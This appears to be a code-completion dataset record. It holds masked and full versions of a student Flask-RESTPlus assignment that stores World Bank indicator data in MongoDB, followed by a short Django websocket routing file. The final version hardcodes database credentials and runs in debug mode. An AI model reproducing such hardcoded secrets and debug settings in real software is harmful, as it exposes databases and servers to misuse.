Arab World)')\nclass CollectionByCountryYear(Resource):\n\n @api.doc(description=\n '[Q5] Retrieve economic indicator value for given a country and year.')\n @api.response(200,\n 'Successfully retrieved economic indicator for given a country and year.'\n )\n @api.response(400, 'Unable to retrieve indicator entry.')\n @api.response(404, 'Unable to find collection.')\n def get(self, collection_id, year, country):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['country'] == country and entry['date'] == year]\n if len(filtered_entries) == 0:\n return {'message':\n f\"Unable to find specific indicator entry for country='{country}' and year='{year}'.\"\n }, 400\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], **filtered_entries[0]}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>', endpoint=\n f'{COLLECTION}_by_top_bottom')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\nclass CollectionByTopBottom(Resource):\n\n @api.doc(description=\n '[Q6] Retrieve top/bottom economic indicator values for a given year.')\n @api.response(200, 'Successfully retreived economic indicator values.')\n @api.response(404, 'Unable to find collection.')\n @api.expect(parser)\n def get(self, collection_id, year):\n query = request.args.get('q')\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['date'] == year]\n if not query:\n return {'indicator': collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': filtered_entries\n }, 200\n return {'indicator': 
collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': sorted(\n filtered_entries, key=lambda k: k['value'], reverse=True)[\n query_to_index(query, len(filtered_entries))]}, 200\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT\n ):\n response = requests.get(api_url(indicator=indicator, page=page)).json()\n if not indicator or len(response) <= 1 and response[0]['message'][0]['key'\n ] == 'Invalid value':\n return 'Invalid indicator'\n if response[0]['page'] >= max_pages or response[0]['page'] == response[0][\n 'pages']:\n return prevRes + response[1]\n return get_indicator_data(indicator=indicator, page=response[0]['page'] +\n 1, prevRes=prevRes + response[1], max_pages=max_pages)\n\n\n<mask token>\n\n\[email protected](f'/{COLLECTION}', endpoint=COLLECTION)\nclass CollectionIndex(Resource):\n\n @api.doc(description='[Q1] Import a collection from the data service.')\n @api.response(200, 'Successfully retrieved collection.')\n @api.response(201, 'Successfully created collection.')\n @api.response(400, 'Unable to create / retrieve collection.')\n @api.expect(indicator_model)\n def post(self):\n body = request.json\n if not body['indicator_id']:\n return {'message': 'Please specify an indicator.'}, 400\n existing_collection = db[COLLECTION].find_one({'indicator': body[\n 'indicator_id']})\n if existing_collection:\n return {'location':\n f\"/{COLLECTION}/{str(existing_collection['_id'])}\",\n 'collection_id': str(existing_collection['_id']),\n 'creation_time': str(existing_collection['creation_time']),\n 'indicator': existing_collection['indicator']}, 200\n indicator_data = get_indicator_data(body['indicator_id'])\n if indicator_data == 'Invalid indicator':\n return {'message': 'Please specify a valid indicator.'}, 400\n collection = {'indicator': indicator_data[0]['indicator']['id'],\n 'indicator_value': indicator_data[0]['indicator']['value'],\n 'creation_time': datetime.datetime.utcnow(), 'entries': [\n format_collection_entry(entry) for entry in indicator_data]}\n created_collection = db[COLLECTION].insert_one(collection)\n return {'location':\n 
f'/{COLLECTION}/{str(created_collection.inserted_id)}',\n 'collection_id': str(created_collection.inserted_id),\n 'creation_time': str(collection['creation_time']), 'indicator':\n collection['indicator']}, 201\n\n @api.doc(description='[Q3] Retrieve the list of available collections.')\n @api.response(200, 'Successfully retreieved collections.')\n @api.response(400, 'Unable to retreive collections.')\n def get(self):\n try:\n collections = db[COLLECTION].find()\n except:\n return {'message': 'Unable to retrieve collections.'}, 400\n return [{'location': f\"/{COLLECTION}/{str(doc['_id'])}\",\n 'collection_id': str(doc['_id']), 'creation_time': str(doc[\n 'creation_time']), 'indicator': doc['indicator']} for doc in\n collections], 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\nclass CollectionsById(Resource):\n\n @api.doc(description='[Q2] Deleting a collection with the data service.')\n @api.response(200, 'Successfully removed collection.')\n @api.response(404, 'Unable to find collection.')\n @api.response(400, 'Unable to remove collection.')\n def delete(self, collection_id):\n if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):\n return {'message': 'Unable to find collection.'}, 404\n try:\n db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})\n except:\n return {'message': 'Unable to remove collection.'}, 400\n return {'message':\n f'Collection = {collection_id} has been removed from the database!'\n }, 200\n\n @api.doc(description='[Q4] Retrieve a collection.')\n @api.response(200, 'Successfully retreived collection.')\n @api.response(404, 'Unable to retreive collection.')\n def get(self, collection_id):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n return {'collection_id': str(collection['_id']), 'indicator':\n 
collection['indicator'], 'indicator_value': collection[\n 'indicator_value'], 'creation_time': str(collection[\n 'creation_time']), 'entries': collection['entries']}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=\n f'{COLLECTION}_countrydate')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\[email protected]('country', 'Country identifier (eg. Arab World)')\nclass CollectionByCountryYear(Resource):\n\n @api.doc(description=\n '[Q5] Retrieve economic indicator value for given a country and year.')\n @api.response(200,\n 'Successfully retrieved economic indicator for given a country and year.'\n )\n @api.response(400, 'Unable to retrieve indicator entry.')\n @api.response(404, 'Unable to find collection.')\n def get(self, collection_id, year, country):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['country'] == country and entry['date'] == year]\n if len(filtered_entries) == 0:\n return {'message':\n f\"Unable to find specific indicator entry for country='{country}' and year='{year}'.\"\n }, 400\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], **filtered_entries[0]}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>', endpoint=\n f'{COLLECTION}_by_top_bottom')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\nclass CollectionByTopBottom(Resource):\n\n @api.doc(description=\n '[Q6] Retrieve top/bottom economic indicator values for a given year.')\n @api.response(200, 'Successfully retreived economic indicator values.')\n @api.response(404, 'Unable to find collection.')\n @api.expect(parser)\n def get(self, 
collection_id, year):\n query = request.args.get('q')\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['date'] == year]\n if not query:\n return {'indicator': collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': filtered_entries\n }, 200\n return {'indicator': collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': sorted(\n filtered_entries, key=lambda k: k['value'], reverse=True)[\n query_to_index(query, len(filtered_entries))]}, 200\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef mlab_client(dbuser, dbpassword, mlab_inst, dbname):\n return MongoClient(\n f'mongodb://{dbuser}:{dbpassword}@{mlab_inst}.mlab.com:39071/{dbname}'\n )[dbname]\n\n\ndef api_url(indicator, date='2012:2017', fmt='json', page=1):\n return (\n f'http://api.worldbank.org/v2/countries/all/indicators/{indicator}?date={date}&format={fmt}&page={page}'\n )\n\n\ndef get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT\n ):\n response = requests.get(api_url(indicator=indicator, page=page)).json()\n if not indicator or len(response) <= 1 and response[0]['message'][0]['key'\n ] == 'Invalid value':\n return 'Invalid indicator'\n if response[0]['page'] >= max_pages or response[0]['page'] == response[0][\n 'pages']:\n return prevRes + response[1]\n return get_indicator_data(indicator=indicator, page=response[0]['page'] +\n 1, prevRes=prevRes + response[1], max_pages=max_pages)\n\n\ndef format_collection_entry(indicator_data):\n return {'country': indicator_data['country']['value'], 'date':\n indicator_data['date'], 'value': indicator_data['value']}\n\n\ndef query_to_index(query, arr_size):\n try:\n match = re.search('^(bottom|top)\\\\d+$', query).group()\n order = re.search('^(bottom|top)', match).group()\n length = int(re.search('\\\\d+$', match).group())\n if order == 'top':\n return slice(length)\n elif order == 'bottom':\n return slice(arr_size - length, arr_size)\n else:\n return slice(arr_size)\n except:\n return slice(arr_size)\n\n\[email protected](f'/{COLLECTION}', endpoint=COLLECTION)\nclass CollectionIndex(Resource):\n\n @api.doc(description='[Q1] Import a collection from the data service.')\n @api.response(200, 'Successfully retrieved collection.')\n @api.response(201, 'Successfully created collection.')\n @api.response(400, 'Unable to create / retrieve collection.')\n @api.expect(indicator_model)\n def post(self):\n body = request.json\n if not body['indicator_id']:\n return {'message': 'Please specify an 
indicator.'}, 400\n existing_collection = db[COLLECTION].find_one({'indicator': body[\n 'indicator_id']})\n if existing_collection:\n return {'location':\n f\"/{COLLECTION}/{str(existing_collection['_id'])}\",\n 'collection_id': str(existing_collection['_id']),\n 'creation_time': str(existing_collection['creation_time']),\n 'indicator': existing_collection['indicator']}, 200\n indicator_data = get_indicator_data(body['indicator_id'])\n if indicator_data == 'Invalid indicator':\n return {'message': 'Please specify a valid indicator.'}, 400\n collection = {'indicator': indicator_data[0]['indicator']['id'],\n 'indicator_value': indicator_data[0]['indicator']['value'],\n 'creation_time': datetime.datetime.utcnow(), 'entries': [\n format_collection_entry(entry) for entry in indicator_data]}\n created_collection = db[COLLECTION].insert_one(collection)\n return {'location':\n f'/{COLLECTION}/{str(created_collection.inserted_id)}',\n 'collection_id': str(created_collection.inserted_id),\n 'creation_time': str(collection['creation_time']), 'indicator':\n collection['indicator']}, 201\n\n @api.doc(description='[Q3] Retrieve the list of available collections.')\n @api.response(200, 'Successfully retreieved collections.')\n @api.response(400, 'Unable to retreive collections.')\n def get(self):\n try:\n collections = db[COLLECTION].find()\n except:\n return {'message': 'Unable to retrieve collections.'}, 400\n return [{'location': f\"/{COLLECTION}/{str(doc['_id'])}\",\n 'collection_id': str(doc['_id']), 'creation_time': str(doc[\n 'creation_time']), 'indicator': doc['indicator']} for doc in\n collections], 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\nclass CollectionsById(Resource):\n\n @api.doc(description='[Q2] Deleting a collection with the data service.')\n @api.response(200, 'Successfully removed collection.')\n @api.response(404, 'Unable to 
find collection.')\n @api.response(400, 'Unable to remove collection.')\n def delete(self, collection_id):\n if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):\n return {'message': 'Unable to find collection.'}, 404\n try:\n db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})\n except:\n return {'message': 'Unable to remove collection.'}, 400\n return {'message':\n f'Collection = {collection_id} has been removed from the database!'\n }, 200\n\n @api.doc(description='[Q4] Retrieve a collection.')\n @api.response(200, 'Successfully retreived collection.')\n @api.response(404, 'Unable to retreive collection.')\n def get(self, collection_id):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], 'indicator_value': collection[\n 'indicator_value'], 'creation_time': str(collection[\n 'creation_time']), 'entries': collection['entries']}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=\n f'{COLLECTION}_countrydate')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\[email protected]('country', 'Country identifier (eg. 
Arab World)')\nclass CollectionByCountryYear(Resource):\n\n @api.doc(description=\n '[Q5] Retrieve economic indicator value for given a country and year.')\n @api.response(200,\n 'Successfully retrieved economic indicator for given a country and year.'\n )\n @api.response(400, 'Unable to retrieve indicator entry.')\n @api.response(404, 'Unable to find collection.')\n def get(self, collection_id, year, country):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['country'] == country and entry['date'] == year]\n if len(filtered_entries) == 0:\n return {'message':\n f\"Unable to find specific indicator entry for country='{country}' and year='{year}'.\"\n }, 400\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], **filtered_entries[0]}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>', endpoint=\n f'{COLLECTION}_by_top_bottom')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\nclass CollectionByTopBottom(Resource):\n\n @api.doc(description=\n '[Q6] Retrieve top/bottom economic indicator values for a given year.')\n @api.response(200, 'Successfully retreived economic indicator values.')\n @api.response(404, 'Unable to find collection.')\n @api.expect(parser)\n def get(self, collection_id, year):\n query = request.args.get('q')\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['date'] == year]\n if not query:\n return {'indicator': collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': filtered_entries\n }, 200\n return {'indicator': 
collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': sorted(\n filtered_entries, key=lambda k: k['value'], reverse=True)[\n query_to_index(query, len(filtered_entries))]}, 200\n\n\n<mask token>\n",
"step-4": "<mask token>\nparser.add_argument('q', help=\n 'Query param. Expected format: top<k> / bottom<k>, where k is between 1 and 100. Eg. top10, bottom40'\n )\n\n\ndef mlab_client(dbuser, dbpassword, mlab_inst, dbname):\n return MongoClient(\n f'mongodb://{dbuser}:{dbpassword}@{mlab_inst}.mlab.com:39071/{dbname}'\n )[dbname]\n\n\ndef api_url(indicator, date='2012:2017', fmt='json', page=1):\n return (\n f'http://api.worldbank.org/v2/countries/all/indicators/{indicator}?date={date}&format={fmt}&page={page}'\n )\n\n\ndef get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT\n ):\n response = requests.get(api_url(indicator=indicator, page=page)).json()\n if not indicator or len(response) <= 1 and response[0]['message'][0]['key'\n ] == 'Invalid value':\n return 'Invalid indicator'\n if response[0]['page'] >= max_pages or response[0]['page'] == response[0][\n 'pages']:\n return prevRes + response[1]\n return get_indicator_data(indicator=indicator, page=response[0]['page'] +\n 1, prevRes=prevRes + response[1], max_pages=max_pages)\n\n\ndef format_collection_entry(indicator_data):\n return {'country': indicator_data['country']['value'], 'date':\n indicator_data['date'], 'value': indicator_data['value']}\n\n\ndef query_to_index(query, arr_size):\n try:\n match = re.search('^(bottom|top)\\\\d+$', query).group()\n order = re.search('^(bottom|top)', match).group()\n length = int(re.search('\\\\d+$', match).group())\n if order == 'top':\n return slice(length)\n elif order == 'bottom':\n return slice(arr_size - length, arr_size)\n else:\n return slice(arr_size)\n except:\n return slice(arr_size)\n\n\[email protected](f'/{COLLECTION}', endpoint=COLLECTION)\nclass CollectionIndex(Resource):\n\n @api.doc(description='[Q1] Import a collection from the data service.')\n @api.response(200, 'Successfully retrieved collection.')\n @api.response(201, 'Successfully created collection.')\n @api.response(400, 'Unable to create / retrieve collection.')\n 
@api.expect(indicator_model)\n def post(self):\n body = request.json\n if not body['indicator_id']:\n return {'message': 'Please specify an indicator.'}, 400\n existing_collection = db[COLLECTION].find_one({'indicator': body[\n 'indicator_id']})\n if existing_collection:\n return {'location':\n f\"/{COLLECTION}/{str(existing_collection['_id'])}\",\n 'collection_id': str(existing_collection['_id']),\n 'creation_time': str(existing_collection['creation_time']),\n 'indicator': existing_collection['indicator']}, 200\n indicator_data = get_indicator_data(body['indicator_id'])\n if indicator_data == 'Invalid indicator':\n return {'message': 'Please specify a valid indicator.'}, 400\n collection = {'indicator': indicator_data[0]['indicator']['id'],\n 'indicator_value': indicator_data[0]['indicator']['value'],\n 'creation_time': datetime.datetime.utcnow(), 'entries': [\n format_collection_entry(entry) for entry in indicator_data]}\n created_collection = db[COLLECTION].insert_one(collection)\n return {'location':\n f'/{COLLECTION}/{str(created_collection.inserted_id)}',\n 'collection_id': str(created_collection.inserted_id),\n 'creation_time': str(collection['creation_time']), 'indicator':\n collection['indicator']}, 201\n\n @api.doc(description='[Q3] Retrieve the list of available collections.')\n @api.response(200, 'Successfully retreieved collections.')\n @api.response(400, 'Unable to retreive collections.')\n def get(self):\n try:\n collections = db[COLLECTION].find()\n except:\n return {'message': 'Unable to retrieve collections.'}, 400\n return [{'location': f\"/{COLLECTION}/{str(doc['_id'])}\",\n 'collection_id': str(doc['_id']), 'creation_time': str(doc[\n 'creation_time']), 'indicator': doc['indicator']} for doc in\n collections], 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\nclass CollectionsById(Resource):\n\n 
@api.doc(description='[Q2] Deleting a collection with the data service.')\n @api.response(200, 'Successfully removed collection.')\n @api.response(404, 'Unable to find collection.')\n @api.response(400, 'Unable to remove collection.')\n def delete(self, collection_id):\n if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):\n return {'message': 'Unable to find collection.'}, 404\n try:\n db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})\n except:\n return {'message': 'Unable to remove collection.'}, 400\n return {'message':\n f'Collection = {collection_id} has been removed from the database!'\n }, 200\n\n @api.doc(description='[Q4] Retrieve a collection.')\n @api.response(200, 'Successfully retreived collection.')\n @api.response(404, 'Unable to retreive collection.')\n def get(self, collection_id):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], 'indicator_value': collection[\n 'indicator_value'], 'creation_time': str(collection[\n 'creation_time']), 'entries': collection['entries']}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=\n f'{COLLECTION}_countrydate')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\[email protected]('country', 'Country identifier (eg. 
Arab World)')\nclass CollectionByCountryYear(Resource):\n\n @api.doc(description=\n '[Q5] Retrieve economic indicator value for given a country and year.')\n @api.response(200,\n 'Successfully retrieved economic indicator for given a country and year.'\n )\n @api.response(400, 'Unable to retrieve indicator entry.')\n @api.response(404, 'Unable to find collection.')\n def get(self, collection_id, year, country):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['country'] == country and entry['date'] == year]\n if len(filtered_entries) == 0:\n return {'message':\n f\"Unable to find specific indicator entry for country='{country}' and year='{year}'.\"\n }, 400\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], **filtered_entries[0]}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>', endpoint=\n f'{COLLECTION}_by_top_bottom')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\nclass CollectionByTopBottom(Resource):\n\n @api.doc(description=\n '[Q6] Retrieve top/bottom economic indicator values for a given year.')\n @api.response(200, 'Successfully retreived economic indicator values.')\n @api.response(404, 'Unable to find collection.')\n @api.expect(parser)\n def get(self, collection_id, year):\n query = request.args.get('q')\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['date'] == year]\n if not query:\n return {'indicator': collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': filtered_entries\n }, 200\n return {'indicator': 
collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': sorted(\n filtered_entries, key=lambda k: k['value'], reverse=True)[\n query_to_index(query, len(filtered_entries))]}, 200\n\n\nif __name__ == '__main__':\n db = mlab_client(dbuser=DB_CONFIG['dbuser'], dbpassword=DB_CONFIG[\n 'dbpassword'], mlab_inst=DB_CONFIG['mlab_inst'], dbname=DB_CONFIG[\n 'dbname'])\n app.run(debug=DEBUG)\n",
"step-5": "#!/usr/bin/env python3\nfrom flask import Flask, request\nfrom flask_restplus import Resource, Api, fields\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\nimport requests, datetime, re\n\n#------------- CONFIG CONSTANTS -------------#\n\nDEBUG = True\nMAX_PAGE_LIMIT = 2\nCOLLECTION = 'indicators'\nDB_CONFIG = {\n 'dbuser': 'z5113243',\n 'dbpassword': 'badpassword01',\n 'mlab_inst': 'ds239071',\n 'dbname': 'cs9321_ass2' \n}\n\n#------------- API INITIALISATION -------------#\n\ndb = None # initialised in main\napp = Flask(__name__)\napp.config.SWAGGER_UI_DOC_EXPANSION = 'list'\napi = Api(\n app,\n title='Assignment 2 - COMP9321 - Chris Joy (z5113243)',\n description='In this assignment, we\\'re asked to develop ' \\\n 'a Flask-Restplus data service that allows a client to ' \\\n 'read and store some publicly available economic indicator ' \\\n 'data for countries around the world, and allow the consumers ' \\\n 'to access the data through a REST API.'\n)\nindicator_model = api.model(COLLECTION, {\n 'indicator_id': fields.String(required=True,\n title='An Indicator ',\n description='http://api.worldbank.org/v2/indicators',\n example='NY.GDP.MKTP.CD'),\n})\nparser = api.parser()\nparser.add_argument('q', help='Query param. Expected format: top<k> / bottom<k>, ' \\\n 'where k is between 1 and 100. Eg. 
top10, bottom40')\n\n#------------- HELPER FUNCTIONS -------------#\n\ndef mlab_client(dbuser, dbpassword, mlab_inst, dbname):\n return MongoClient(\n f'mongodb://{dbuser}:{dbpassword}@{mlab_inst}.mlab.com:39071/{dbname}'\n )[dbname]\n\ndef api_url(indicator, date='2012:2017', fmt='json', page=1):\n return 'http://api.worldbank.org/v2/countries/all/indicators/' \\\n f'{indicator}?date={date}&format={fmt}&page={page}'\n\n# Recursively build an array containing indicator data\ndef get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT):\n response = requests.get(api_url(indicator=indicator, page=page)).json()\n if not indicator or (len(response) <= 1 and response[0]['message'][0]['key'] == 'Invalid value'):\n return 'Invalid indicator'\n if response[0]['page'] >= max_pages or response[0]['page'] == response[0]['pages']:\n return prevRes+response[1]\n return get_indicator_data(\n indicator=indicator,\n page=response[0]['page']+1,\n prevRes=prevRes+response[1],\n max_pages=max_pages,\n )\n\n# Restructure indicator entry according to spec\ndef format_collection_entry(indicator_data):\n return {\n 'country': indicator_data['country']['value'],\n 'date': indicator_data['date'],\n 'value': indicator_data['value'],\n }\n\n# Transform to top<k>/bottom<k> queries to array indexes\ndef query_to_index(query, arr_size):\n try:\n match = re.search(r'^(bottom|top)\\d+$', query).group()\n order = re.search(r'^(bottom|top)', match).group()\n length = int(re.search(r'\\d+$', match).group())\n if order == 'top':\n return slice(length)\n elif order == 'bottom':\n return slice(arr_size-length, arr_size)\n else:\n return slice(arr_size)\n except:\n return slice(arr_size)\n\n#------------- QUESTION ROUTES -------------#\n\[email protected](f'/{COLLECTION}', endpoint=COLLECTION)\nclass CollectionIndex(Resource):\n @api.doc(description='[Q1] Import a collection from the data service.')\n @api.response(200, 'Successfully retrieved collection.')\n @api.response(201, 
'Successfully created collection.')\n @api.response(400, 'Unable to create / retrieve collection.')\n @api.expect(indicator_model)\n def post(self):\n body = request.json\n # Indicator hasn't been specified in body (400)\n if not body['indicator_id']:\n return { 'message': 'Please specify an indicator.' }, 400\n # Retrieve indicator from database (200)\n existing_collection = db[COLLECTION].find_one({'indicator': body['indicator_id']})\n if existing_collection:\n return {\n 'location': f'/{COLLECTION}/{str(existing_collection[\"_id\"])}',\n 'collection_id': str(existing_collection['_id']),\n 'creation_time': str(existing_collection['creation_time']),\n 'indicator': existing_collection['indicator'],\n }, 200\n # From now onwards we need to obtain data from the Worldbank API\n indicator_data = get_indicator_data(body['indicator_id'])\n # Valid indicator hasn't been specified (400)\n if indicator_data == 'Invalid indicator':\n return { 'message': 'Please specify a valid indicator.' }, 400\n # Create and retrieve indicator from Worldbank API (201)\n collection = {\n 'indicator': indicator_data[0]['indicator']['id'],\n 'indicator_value': indicator_data[0]['indicator']['value'],\n 'creation_time': datetime.datetime.utcnow(),\n 'entries': [format_collection_entry(entry) for entry in indicator_data],\n }\n created_collection = db[COLLECTION].insert_one(collection)\n return {\n 'location': f'/{COLLECTION}/{str(created_collection.inserted_id)}',\n 'collection_id': str(created_collection.inserted_id),\n 'creation_time': str(collection['creation_time']),\n 'indicator': collection['indicator'],\n }, 201\n\n @api.doc(description='[Q3] Retrieve the list of available collections.')\n @api.response(200, 'Successfully retreieved collections.')\n @api.response(400, 'Unable to retreive collections.')\n def get(self):\n try:\n collections = db[COLLECTION].find()\n except:\n return { 'message': 'Unable to retrieve collections.' 
}, 400\n return [{\n 'location': f'/{COLLECTION}/{str(doc[\"_id\"])}',\n 'collection_id': str(doc['_id']),\n 'creation_time': str(doc['creation_time']),\n 'indicator': doc['indicator'],\n } for doc in collections], 200\n\[email protected](f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\nclass CollectionsById(Resource):\n @api.doc(description='[Q2] Deleting a collection with the data service.')\n @api.response(200, 'Successfully removed collection.')\n @api.response(404, 'Unable to find collection.')\n @api.response(400, 'Unable to remove collection.')\n def delete(self, collection_id):\n # Check if collection exists\n if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):\n return { 'message': 'Unable to find collection.' }, 404\n # Remove collection from db\n try:\n db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})\n except:\n return { 'message': 'Unable to remove collection.' }, 400\n return { 'message': f'Collection = {collection_id} has been removed from the database!' 
}, 200\n\n @api.doc(description='[Q4] Retrieve a collection.')\n @api.response(200, 'Successfully retreived collection.')\n @api.response(404, 'Unable to retreive collection.')\n def get(self, collection_id):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(collection_id)})\n except:\n return { 'message': 'Unable to find collection' }, 404\n return {\n 'collection_id': str(collection['_id']),\n 'indicator': collection['indicator'],\n 'indicator_value': collection['indicator_value'],\n 'creation_time': str(collection['creation_time']),\n 'entries': collection['entries'],\n }, 200\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=f'{COLLECTION}_countrydate')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\[email protected]('country', 'Country identifier (eg. Arab World)')\nclass CollectionByCountryYear(Resource):\n @api.doc(description='[Q5] Retrieve economic indicator value for given a country and year.')\n @api.response(200, 'Successfully retrieved economic indicator for given a country and year.')\n @api.response(400, 'Unable to retrieve indicator entry.')\n @api.response(404, 'Unable to find collection.')\n def get(self, collection_id, year, country):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(collection_id)})\n except:\n return { 'message': 'Unable to find collection' }, 404\n # Create a filtered list containing entries that match params\n filtered_entries = [\n entry for entry in collection['entries'] if entry['country'] == country and entry['date'] == year\n ]\n if len(filtered_entries) == 0:\n return {'message': 'Unable to find specific indicator entry ' \\\n f'for country=\\'{country}\\' and year=\\'{year}\\'.'}, 400\n return {\n 'collection_id': str(collection['_id']),\n 'indicator': collection['indicator'],\n **filtered_entries[0],\n }, 200\n\[email 
protected](f'/{COLLECTION}/<collection_id>/<year>', endpoint=f'{COLLECTION}_by_top_bottom')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\nclass CollectionByTopBottom(Resource):\n @api.doc(description='[Q6] Retrieve top/bottom economic indicator values for a given year.')\n @api.response(200, 'Successfully retreived economic indicator values.')\n @api.response(404, 'Unable to find collection.')\n @api.expect(parser)\n def get(self, collection_id, year):\n query = request.args.get('q')\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(collection_id)})\n except:\n return { 'message': 'Unable to find collection' }, 404\n filtered_entries = [\n entry for entry in collection['entries'] if entry['date'] == year\n ]\n if not query:\n return {\n 'indicator': collection['indicator'],\n 'indicator_value': collection['indicator_value'],\n 'entries': filtered_entries,\n }, 200\n return {\n 'indicator': collection['indicator'],\n 'indicator_value': collection['indicator_value'],\n 'entries': sorted(\n filtered_entries,\n key=lambda k: k['value'],\n reverse=True\n )[query_to_index(query, len(filtered_entries))],\n }, 200\n\nif __name__ == '__main__':\n db = mlab_client(\n dbuser=DB_CONFIG['dbuser'],\n dbpassword=DB_CONFIG['dbpassword'],\n mlab_inst=DB_CONFIG['mlab_inst'],\n dbname=DB_CONFIG['dbname']\n )\n app.run(debug=DEBUG)",
"step-ids": [
7,
11,
15,
16,
19
]
}
|
[
7,
11,
15,
16,
19
] |
from django.conf.urls import url
from . import consumers
websocket_urlpatterns = [
url(r'^account/home', consumers.NotificationConsumer),
url(r'^fund/(?P<fund>[\w-]+)', consumers.NotificationConsumer),
url(r'^websockets', consumers.StreamConsumer),
]
|
normal
|
{
"blob_id": "7ab9c530035185ee2250f3f6ce8cde87bdfd9803",
"index": 5295,
"step-1": "<mask token>\n",
